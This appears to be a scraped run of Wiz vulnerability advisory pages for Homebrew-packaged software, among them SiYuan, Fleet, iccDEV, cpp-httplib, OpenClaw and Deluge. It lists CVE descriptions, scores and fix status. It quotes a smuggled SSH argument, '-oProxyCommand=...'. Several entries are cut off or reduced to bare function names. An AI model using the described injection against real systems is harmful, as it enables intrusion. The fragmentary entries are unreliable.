CVE-2026-2659 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2659 [MEDIUM] CVE-2026-2659 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2659 :
Homebrew vulnerability analysis and mitigation
A vulnerability was determined in Squirrel up to 3.2. Affected by this vulnerability is the function SQFuncState::PopTarget of the file src/squirrel/squirrel/sqfuncstate.cpp. Executing a manipulation of the argument _target_stack can lead to out-of-bounds read. It is possible to launch the attack on the local host. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 4.8
Score
Published February 18, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Proba
Wiz
CVE-2026-25963 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.2
CVE-2026-25963 [LOW] CVE-2026-25963 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25963 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. In versions prior to 4.80.1, a broken authorization check in Fleet’s certificate template deletion API could allow a team administrator to delete certificate templates belonging to other teams within the same Fleet instance. Fleet supports certificate templates that are scoped to individual teams. In affected versions, the batch deletion endpoint validated authorization using a user-supplied team identifier but did not verify that the certificate template IDs being deleted actually belonged to that team. As a result, a team administrator could delete certificate templates associated with other teams, potentially disrupting certificate-based workflows such as device enrollme
Wiz
CVE-2025-9292 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2025-9292 [LOW] CVE-2025-9292 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-9292 :
Homebrew vulnerability analysis and mitigation
A permissive web security configuration may allow cross-origin restrictions enforced by modern browsers to be bypassed under specific circumstances. Exploitation requires the presence of an existing client-side injection vulnerability and user access to the affected web interface. Successful exploitation could allow unauthorized disclosure of sensitive information. Fixed in updated Omada Cloud Controller service versions deployed automatically by TP‑Link. No user action is required.
Source : NVD
## 2
Score
Published February 13, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability
Wiz
CVE-2026-21681 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-21681 [HIGH] CVE-2026-21681 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21681 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Undefined Behavior runtime error. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available.
Source : NVD
## 7.1
Score
Published January 7, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.6
Exploitation Probability (EPSS) 0.1
Affected packages and libra
Wiz
CVE-2026-23518 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-23518 [CRITICAL] CVE-2026-23518 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23518 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. In versions prior to 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3, a vulnerability in Fleet's Windows MDM enrollment flow could allow an attacker to submit forged authentication tokens that are not properly validated. Because JWT signatures were not verified, Fleet could accept attacker-controlled identity claims, enabling enrollment of unauthorized devices under arbitrary Azure AD user identities. Versions 4.78.3, 4.77.1, 4.76.2, 4.75.2, and 4.53.3 fix the issue. If an immediate upgrade is not possible, affected Fleet users should temporarily disable Windows MDM.
Source : NVD
## 9.3
Score
Published January 21, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologi
Wiz
CVE-2022-50917 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2022-50917 [HIGH] CVE-2022-50917 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50917 :
Homebrew vulnerability analysis and mitigation
ProtonVPN 1.26.0 contains an unquoted service path vulnerability in its WireGuard service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path by placing malicious executables in specific file system locations to gain elevated privileges during service startup.
Source : NVD
## 8.5
Score
Published January 13, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
protonvpn
Sources
NVD
Homebrew Severity HIGH No Fix Added
Wiz
CVE-2019-25586 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2019-25586 [MEDIUM] CVE-2019-25586 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2019-25586 :
Homebrew vulnerability analysis and mitigation
Deluge 1.3.15 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the URL field. Attackers can paste a buffer of 5000 characters into the 'From URL' field during torrent addition to trigger an application crash.
Source : NVD
## 6.9
Score
Published March 22, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
deluge
Sources
NVD
Homebrew Severity MEDIUM No Fix Added at: Mar 26, 2026
## Get a CVE
Wiz
CVE-2026-27007 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-27007 [MEDIUM] CVE-2026-27007 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27007 :
Homebrew vulnerability analysis and mitigation
normalizeForHash
src/agents/sandbox/config-hash.ts
dns
binds
Source : NVD
## 4.8
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
OpenClaw (formerly Moltbot or Clawdbot)
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openclaw
Sources
NVD
npm Severity MEDIUM Has Fix Added at: Feb 19, 2026
Homebrew Severity LOW Has Fix Added at: Feb 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related
Wiz
CVE-2026-30982 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-30982 [MEDIUM] CVE-2026-30982 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30982 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to 2.3.1.5, there is a heap out-of-bounds read in CIccPcsXform::pushXYZConvert() causing crash and potentially leaking memory contents. This vulnerability is fixed in 2.3.1.5.
Source : NVD
## 6.1
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Mar 16, 2026
## Get a CVE risk assessment
Get a
Wiz
CVE-2026-23845 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-23845 [MEDIUM] CVE-2026-23845 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23845 :
Homebrew vulnerability analysis and mitigation
/api/v1/message/{ID}/html-check
inlineRemoteCSS()
Source : NVD
## 7.5
Score
Published January 19, 2026
Severity HIGH
CNA Score 5.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
mailpit
github.com/axllent/mailpit
Sources
NVD
GoLang Severity MEDIUM Has Fix Added at: Jan 21, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilitie
Wiz
CVE-2026-34605 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-34605 [MEDIUM] CVE-2026-34605 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34605 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. From version 3.6.0 to before version 3.6.2, the SanitizeSVG function introduced in version 3.6.0 to fix XSS in the unauthenticated /api/icon/getDynamicIcon endpoint can be bypassed by using namespace-prefixed element names such as . The Go HTML5 parser records the element's tag as "x:script" rather than "script", so the tag check passes it through. The SVG is served with Content-Type: image/svg+xml and no Content Security Policy; when a browser opens the response directly, its XML parser resolves the prefix to the SVG namespace and executes the embedded script. This issue has been patched in version 3.6.2.
Source : NVD
## 8.6
Score
Published March 31, 2026
Severity
Wiz
CVE-2026-25060 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-25060 [HIGH] CVE-2026-25060 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25060 :
Homebrew vulnerability analysis and mitigation
OpenList Frontend is a UI component for OpenList. Prior to 4.1.10, certificate verification is disabled by default for all storage driver communications. The TlsInsecureSkipVerify setting is default to true in the DefaultConfig() function in internal/conf/config.go. This vulnerability enables Man-in-the-Middle (MitM) attacks by disabling TLS certificate verification, allowing attackers to intercept and manipulate all storage communications. Attackers can exploit this through network-level attacks like ARP spoofing, rogue Wi-Fi access points, or compromised internal network equipment to redirect traffic to malicious endpoints. Since certificate validation is skipped, the system will unknowingly establish encrypted connecti
Wiz
CVE-2019-25585 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2019-25585 [MEDIUM] CVE-2019-25585 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2019-25585 :
Homebrew vulnerability analysis and mitigation
Deluge 1.3.15 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the Webseeds field. Attackers can paste a buffer of 5000 bytes into the Webseeds field during torrent creation to trigger an application crash.
Source : NVD
## 6.9
Score
Published March 22, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
deluge
Sources
NVD
Homebrew Severity MEDIUM No Fix Added at: Mar 26, 2026
## Get a CVE ri
Wiz
CVE-2026-26055 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-26055 [HIGH] CVE-2026-26055 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26055 :
Homebrew vulnerability analysis and mitigation
Yoke is a Helm-inspired infrastructure-as-code (IaC) package deployer. In 0.19.0 and earlier, a vulnerability exists in the Air Traffic Controller (ATC) component of Yoke. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.
Source : NVD
## 7.5
Score
Published February 12, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Explo
Wiz
CVE-2026-34448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.0
CVE-2026-34448 [CRITICAL] CVE-2026-34448 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34448 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.6.2, an attacker who can place a malicious URL in an Attribute View mAsse field can trigger stored XSS when a victim opens the Gallery or Kanban view with “Cover From -> Asset Field” enabled. The vulnerable code accepts arbitrary http(s) URLs without extensions as images, stores the attacker-controlled string in coverURL, and injects it directly into an attribute without escaping. In the Electron desktop client, the injected JavaScript executes with nodeIntegration enabled and contextIsolation disabled, so the XSS reaches arbitrary OS command execution under the victim’s account. This issue has been patched in version 3.6.2.
Source : NVD
## 9
Score
Wiz
CVE-2026-25539 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-25539 [CRITICAL] CVE-2026-25539 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25539 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. Prior to version 3.5.5, the /api/file/copyFile endpoint does not validate the dest parameter, allowing authenticated users to write files to arbitrary locations on the filesystem. This can lead to Remote Code Execution (RCE) by writing to sensitive locations such as cron jobs, SSH authorized_keys, or shell configuration files. This issue has been patched in version 3.5.5.
Source : NVD
## 7.2
Score
Published February 4, 2026
Severity HIGH
CNA Score 9.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 45.9
Exploitation Probability (EPSS) 0.2
Wiz
CVE-2025-25364 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.4
CVE-2025-25364 [HIGH] CVE-2025-25364 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-25364 :
Homebrew vulnerability analysis and mitigation
A command injection vulnerability in the me.connectify.SMJobBlessHelper XPC service of Speedify VPN up to v15.0.0 allows attackers to execute arbitrary commands with root-level privileges.
Source : NVD
## 8.4
Score
Published December 23, 2025
Severity HIGH
CNA Score 8.4
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
speedify
Sources
NVD
Homebrew Severity HIGH No Fix Added at: Jan 08, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not ju
Wiz
CVE-2025-64733 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-64733 [MEDIUM] CVE-2025-64733 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-64733 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-25157 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-25157 [HIGH] CVE-2026-25157 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25157 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. Prior to version 2026.1.29, there is an OS command injection vulnerability via the Project Root Path in sshNodeCommand. The sshNodeCommand function constructed a shell script without properly escaping the user-supplied project path in an error message. When the cd command failed, the unescaped path was interpolated directly into an echo statement, allowing arbitrary command execution on the remote SSH host. The parseSSHTarget function did not validate that SSH target strings could not begin with a dash. An attacker-supplied target like -oProxyCommand=... would be interpreted as an SSH configuration flag rather than a hostname, allowing arbitrary command execution on the local machine.
Wiz
CVE-2026-29076 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-29076 [MEDIUM] CVE-2026-29076 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29076 :
Homebrew vulnerability analysis and mitigation
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.37.0, cpp-httplib uses std::regex (libstdc++) to parse RFC 5987 encoded filename* values in multipart Content-Disposition headers. The regex engine in libstdc++ implements backtracking via deep recursion, consuming one stack frame per input character. An attacker can send a single HTTP POST request with a crafted filename* parameter that causes uncontrolled stack growth, resulting in a stack overflow (SIGSEGV) that crashes the server process. This issue has been patched in version 0.37.0.
Source : NVD
## 5.9
Score
Published March 7, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Homebrew
Linux Debian
Wiz
CVE-2026-26056 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-26056 [HIGH] CVE-2026-26056 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26056 :
Homebrew vulnerability analysis and mitigation
Yoke is a Helm-inspired infrastructure-as-code (IaC) package deployer. In 0.19.0 and earlier, a vulnerability exists in the Air Traffic Controller (ATC) component of Yoke. It allows users with CR create/update permissions to execute arbitrary WASM code in the ATC controller context by injecting a malicious URL through the overrides.yoke.cd/flight annotation. The ATC controller downloads and executes the WASM module without proper URL validation, enabling attackers to create arbitrary Kubernetes resources or potentially escalate privileges to cluster-admin level.
Source : NVD
## 8.8
Score
Published February 12, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV E
Wiz
CVE-2026-32719 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.2
CVE-2026-32719 [MEDIUM] CVE-2026-32719 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32719 :
Homebrew vulnerability analysis and mitigation
AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. In 1.11.1 and earlier, The ImportedPlugin.importCommunityItemFromUrl() function in server/utils/agents/imported.js downloads a ZIP file from a community hub URL and extracts it using AdmZip.extractAllTo() without validating file paths within the archive. This enables a Zip Slip path traversal attack that can lead to arbitrary code execution.
Source : NVD
## 6.4
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 4.2
Affected Technologies
Homebrew
AnythingLLM
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Per
Wiz
CVE-2026-27484 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.3
CVE-2026-27484 [LOW] CVE-2026-27484 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27484 :
Homebrew vulnerability analysis and mitigation
OpenClaw is a personal AI assistant. In versions 2026.2.17 and below, the Discord moderation action handling (timeout, kick, ban) uses sender identity from request parameters in tool-driven flows, instead of trusted runtime sender context. In setups where Discord moderation actions are enabled and the bot has the necessary guild permissions, a non-admin user can request moderation actions by spoofing sender identity fields. This issue has been fixed in version 2026.2.18.
Source : NVD
## 2.3
Score
Published February 21, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
Homebrew
MinimOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability
Wiz
CVE-2026-34386 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-34386 [MEDIUM] CVE-2026-34386 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34386 :
Homebrew vulnerability analysis and mitigation
Fleet is open source device management software. Prior to 4.81.0, a SQL injection vulnerability in Fleet's MDM bootstrap package configuration allows an authenticated user with Team Admin or Global Admin privileges to modify arbitrary team configurations, exfiltrate sensitive data from the Fleet database, and inject arbitrary content into team configs via direct API calls. Version 4.81.0 patches the issue.
Source : NVD
## 6.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.2
Exploitation Probability (EPSS) N/A
Affected packag
Wiz
CVE-2026-22776 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-22776 [HIGH] CVE-2026-22776 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22776 :
Homebrew vulnerability analysis and mitigation
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.30.1, a Denial of Service (DoS) vulnerability exists in cpp-httplib due to the unsafe handling of compressed HTTP request bodies (Content-Encoding: gzip, br, etc.). The library validates the payload_max_length against the compressed data size received from the network, but does not limit the size of the decompressed data stored in memory.
Source : NVD
## 8.7
Score
Published January 12, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.7
Expl
Wiz
CVE-2025-62500 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2025-62500 [MEDIUM] CVE-2025-62500 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62500 :
Homebrew vulnerability analysis and mitigation
An out-of-bounds read vulnerability exists in the EMF functionality of Canva Affinity. By using a specially crafted EMF file, an attacker could exploit this vulnerability to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.
Source : NVD
## 7.1
Score
Published March 17, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
affinity
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a priorit
Wiz
CVE-2026-34441 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-34441 [MEDIUM] CVE-2026-34441 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34441 :
Homebrew vulnerability analysis and mitigation
cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.40.0, cpp-httplib is vulnerable to HTTP Request Smuggling. The server's static file handler serves GET responses without consuming the request body. On HTTP/1.1 keep-alive connections, the unread body bytes remain on the TCP stream and are interpreted as the start of a new HTTP request. An attacker can embed an arbitrary HTTP request inside the body of a GET request, which the server processes as a separate request. This issue has been patched in version 0.40.0.
Source : NVD
## 6.5
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Homebrew
Linux Debian
Has Public Exploit Yes
Ha
Wiz
CVE-2026-21493 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.6
CVE-2026-21493 [MEDIUM] CVE-2026-21493 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21493 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are vulnerable to Type Confusion in its CIccSingleSampledeCurveXml class during XML Curve Serialization. This issue is fixed in version 2.3.1.2.
Source : NVD
## 6.6
Score
Published January 6, 2026
Severity MEDIUM
CNA Score 6.6
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 18, 2026
## Get a CVE risk assessment
Get a prioritize
Wiz
CVE-2026-21686 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-21686 [HIGH] CVE-2026-21686 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21686 :
Homebrew vulnerability analysis and mitigation
CIccTagLutAtoB::Validate()
Source : NVD
## 7.1
Score
Published January 7, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 32.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Homebrew vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-202
Wiz
CVE-2026-32938 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-32938 [CRITICAL] CVE-2026-32938 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32938 :
Homebrew vulnerability analysis and mitigation
SiYuan is a personal knowledge management system. In versions 3.6.0 and below, the /api/lute/html2BlockDOM on the desktop copies local files pointed to by file:// links in pasted HTML into the workspace assets directory without validating paths against a sensitive-path list. Together with GET /assets/*path, which only requires authentication, a publish-service visitor can cause the desktop kernel to copy any readable sensitive file and then read it via GET, leading to exfiltration of sensitive files. This issue has been fixed in version 3.6.1.
Source : NVD
## 6.5
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 9.9
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV
Wiz
CVE-2026-2655 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-2655 [LOW] CVE-2026-2655 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2655 :
Homebrew vulnerability analysis and mitigation
A vulnerability was detected in ChaiScript up to 6.1.0. The impacted element is the function chaiscript::str_less::operator of the file include/chaiscript/chaiscript_defines.hpp. The manipulation results in use after free. The attack requires a local approach. The attack requires a high level of complexity. The exploitability is regarded as difficult. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.
Source : NVD
## 2
Score
Published February 18, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Proba
Wiz
CVE-2026-21489 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-21489 [MEDIUM] CVE-2026-21489 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21489 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below have Out-of-bounds Read and Integer Underflow (Wrap or Wraparound) vulnerabilities in its CIccCalculatorFunc::SequenceNeedTempReset function. This issue is fixed in version 2.3.1.2.
Source : NVD
## 7.1
Score
Published January 6, 2026
Severity HIGH
CNA Score 6.1
Affected Technologies
Homebrew
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity HIGH Has Fix Added at: Jan 18, 2026
## Get a CVE
Wiz
CVE-2026-21496 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-21496 [MEDIUM] CVE-2026-21496 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21496 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the signature parser. This issue has been patched in version 2.3.1.2.
Source : NVD
## 5.5
Score
Published January 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
Sources
NVD
Homebrew Severity MEDIUM Has Fix Added at: Jan 12, 2026
## Get a CVE risk asse
Wiz
CVE-2026-25502 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-25502 [HIGH] CVE-2026-25502 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25502 :
Homebrew vulnerability analysis and mitigation
iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, stack-based buffer overflow in icFixXml() function when processing malformed ICC profiles, allows potential arbitrary code execution through crafted NamedColor2 tags. This issue has been patched in version 2.3.1.2.
Source : NVD
## 7.8
Score
Published February 3, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
iccdev
S
Wiz
CVE-2026-27966 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
